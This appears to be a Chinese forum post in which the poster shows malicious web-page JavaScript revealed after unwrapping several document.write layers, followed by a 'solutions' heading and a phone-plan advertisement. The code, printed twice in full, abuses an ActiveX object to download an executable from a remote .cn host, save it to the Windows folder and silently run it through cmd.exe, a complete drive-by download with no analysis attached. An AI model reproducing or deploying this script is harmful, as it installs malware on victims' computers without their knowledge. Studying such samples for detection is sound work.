经过几次的document.write后看到这些:
function gn(shIU1) {
var yfPGvpvD2 = window["Math"]["random"]()*shIU1;
return '~tmp'+'.tmp';
} try {
dl='http://0001.0168168.cn/0.exe';
var $3=window["document"]["createElement"]("object");
$3["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var EhJhC4=$3["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var KscQ5=$3["CreateObject"]("Adodb.Stream","");
KscQ5["type"]=1;
EhJhC4["open"]("GET", dl,0);
EhJhC4["send"]();
fname1=gn(10000);
var gj6=$3["CreateObject"]("Scripting.FileSystemObject","");
var AfrpBw7=gj6["GetSpecialFolder"](0);
fname1= gj6["BuildPath"](AfrpBw7,fname1);
KscQ5["Open"]();
KscQ5["Write"](EhJhC4["responseBody"]);
KscQ5["SaveToFile"](fname1,2);
KscQ5["Close"]();
var aiQI8=$3["CreateObject"]("Shell.Application","");
exp1=gj6["BuildPath"](AfrpBw7+'\system32','cmd.exe');
aiQI8["ShellExecute"](exp1,' /c '+fname1,"","open",0);
} catch(i) { i=1; }
function gn(shIU1) {
var yfPGvpvD2 = window["Math"]["random"]()*shIU1;
return '~tmp'+'.tmp';
} try {
dl='http://0001.0168168.cn/0.exe';
var $3=window["document"]["createElement"]("object");
$3["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var EhJhC4=$3["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var KscQ5=$3["CreateObject"]("Adodb.Stream","");
KscQ5["type"]=1;
EhJhC4["open"]("GET", dl,0);
EhJhC4["send"]();
fname1=gn(10000);
var gj6=$3["CreateObject"]("Scripting.FileSystemObject","");
var AfrpBw7=gj6["GetSpecialFolder"](0);
fname1= gj6["BuildPath"](AfrpBw7,fname1);
KscQ5["Open"]();
KscQ5["Write"](EhJhC4["responseBody"]);
KscQ5["SaveToFile"](fname1,2);
KscQ5["Close"]();
var aiQI8=$3["CreateObject"]("Shell.Application","");
exp1=gj6["BuildPath"](AfrpBw7+'\system32','cmd.exe');
aiQI8["ShellExecute"](exp1,' /c '+fname1,"","open",0);
} catch(i) { i=1; }
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货